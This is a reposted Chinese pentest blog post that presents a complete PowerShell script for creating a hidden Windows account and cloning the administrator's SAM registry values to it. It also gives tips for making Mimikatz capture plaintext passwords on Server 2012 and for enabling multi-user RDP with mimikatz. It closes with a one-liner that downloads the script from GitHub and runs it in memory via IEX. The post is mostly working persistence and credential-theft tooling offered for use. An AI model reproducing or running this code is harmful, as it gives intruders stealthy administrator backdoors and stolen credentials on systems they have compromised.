你能找到我么?-- 隐藏用户建立(Powershell)

百家 作者:程序员之家 2018-05-19 14:55:38

最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题:

ps:2012抓明文需要HKLM:SYSTEMCurrentControlSetControlSecurityProvidersWDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,才能记录到明文密码。


后来发现以前的建立克隆账号的方式是可以使得新建的账号登陆系统的,为了方便,整理了一个powershell脚本,脚本可以自动修改注册表键值权限(需要用administrator权限运行,即bypassuac以后的权限),之后在进行操作。具体代码如下:


function Create-Clone
{
< #
.SYNOPSIS
This script requires Administrator privileges. use Invoke-
TokenManipulation.ps1 to get system privileges and create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user's password
.PARAMETER cu
The user to clone, default administrator
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
    Param(
        [Parameter(Mandatory=$true)]
        [String]
        $u,
   
        [Parameter(Mandatory=$true)]
        [String]
        $p,
   
        [Parameter(Mandatory=$false)]
        [String]
        $cu = "administrator"
    )
    function upReg{
        "HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $env:tempup.ini
        "HKEY_LOCAL_MACHINESAMSAM [1 17]"| Out-File -Append  $env:tempup.ini
        "HKEY_LOCAL_MACHINESAMSAMDomains [1 17]" | Out-File -Append  $env:tempup.ini
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccount [1 17] "| Out-File -Append  $env:tempup.ini
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [1 17] "| Out-File -Append  $env:tempup.ini
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [1 17]"| Out-File -Append  $env:tempup.ini
        cmd /c "regini $env:tempup.ini"
        Remove-Item $env:tempup.ini
       
    }
    function downreg {
        "HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $env:tempdown.ini
        "HKEY_LOCAL_MACHINESAMSAM [17]"| Out-File -Append  $env:tempdown.ini
        "HKEY_LOCAL_MACHINESAMSAMDomains [17]" | Out-File -Append  $env:tempdown.ini
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccount [17] "| Out-File -Append  $env:tempdown.ini
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [17] "| Out-File -Append  $env:tempdown.ini
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [17]"| Out-File -Append  $env:tempdown.ini
        cmd /c "regini $env:tempdown.ini"
        Remove-Item $env:tempdown.ini
    }
    function Create-user ([string]$Username,[string]$Password) {
        $group = "Administrators"
        $existing = Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$Username"
        if (!$existing) {
            Write-Host "[*] Creating new local user $Username with password $Password"
            & NET USER $Username $Password /add /y /expires:never | Out-Null
            Write-Host "[*] Adding local user $Username to $group."
            & NET LOCALGROUP $group $Username /add | Out-Null
               
        }
        else {
            Write-Host "[*] Adding existing user $Username to $group."
            & NET LOCALGROUP $group $Username /add | Out-Null
            $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
            $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
            Write-Host "[*] Setting password for existing local user $Username"
            $exist.SetPassword($Password)
        }
   
        Write-Host "[*] Ensuring password for $Username never expires."
        & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE   | Out-Null 
    }
    function GetUser-Key([string]$user)
    {
        cmd /c " echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user [1 17] >> $env:temp$user.ini"
        cmd /c "regini $env:temp$user.ini"
        Remove-Item $env:temp$user.ini
        if(Test-Path -Path "HKLM:SAMSAMDomainsAccountUsersNames$user"){
            cmd /c "regedit /e $env:temp$user.reg "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user""
            $file = Get-Content "$env:temp$user.reg"  | Out-String
            $pattern="@=hex((.*?)):"
            $file -match $pattern |Out-Null
            $key = "00000"+$matches[1]
            Write-Host "[!]"$key
            return $key
        }else {
            Write-Host "[-] SomeThing Wrong !"
        }
           
    }
    function Clone ([string]$ukey,[string]$cukey) {
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey [1 17] "| Out-File $env:tempf.ini
        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$cukey [1 17] " | Out-File $env:tempf.ini
        cmd /c " regini $env:tempf.ini"
        Remove-Item $env:tempf.ini
        $ureg = "HKLM:SAMSAMDomainsAccountUsers$ukey" |Out-String
        $cureg = "HKLM:SAMSAMDomainsAccountUsers$cukey" |Out-String
        Write-Host "[*] Get clone user'F value"
        $cuFreg = Get-Item -Path $cureg.Trim()
        $cuFvalue = $cuFreg.GetValue('F')
        Write-Host "[*] Change user'F value"
        Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue
        $outreg = "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey"
        cmd /c "regedit /e $env:tempout.reg $outreg.Trim()"
    }
    function Main () {
        if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
        {
            Write-Output "Script must be run as administrator"
            break
        }
        Write-Output "[*] Start"
        Write-Output "[*] Tring to change reg privilege !"
        upReg
        if( !(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$cu")){
            Write-Host "[-] The User to Clone does not exist !"
            Write-Output "[*] Change reg privilege back !"
            downReg
            Write-Output "[*] Exiting !"
        }
        else {
            if(!(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$u")){
                $tmp = "1"
            }
            else{
                $tmp = "0"
            }
            Write-Output "[*] Create User..."
            Create-user $u $p
            Write-Output "[*] Get User $u's  Key .."
            $ukey = GetUser-Key $u |Out-String
            Write-Output "[*] Get User $cu's  Key .."
            $cukey = GetUser-Key $cu |Out-String
            Write-Output "[*] Clone User.."
            Clone $ukey $cukey
            if($tmp -eq 1 ){
                Write-Output "[*] Delete User.."
                cmd /c "net User $u /del " |Out-Null
            }else{ Write-Output "[*] Don't need to delete.."}
            cmd /c "regedit /s $env:temp$u.reg"
            cmd /c "regedit /s $env:tempout.reg"
            Remove-Item $env:temp*.reg
            Write-Output "[*] Change reg privilege back !"
            downreg
            Write-Output "[*] Done"
        }     
    }
    Main
}


GITHUB:<iframe height="30" width="200" frameborder="0" scrolling="no" style="box-sizing: border-box;-webkit-font-smoothing: antialiased;color: rgb(49, 49, 49);"></iframe>


新建账号以后,可成功登陆系统


在Win7上做的测试如下:


demo:https://evi1cg.me/usr/uploads/2017/11/clone.gif


当然可以配合这个姿势来实现多用户登陆。


使用mimikatz.exe,执行ts::multirdp允许多用户远程登录


ps:该方法在系统重启后失效,下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改


最后是远程执行的方式:


powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1'); Create-Clone -u demo$ -p test123


文章出处:Evi1cg's blog   

原文链接:https://evi1cg.me/archives/UserClone.html

公众号内回复“1”带你进粉丝群

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接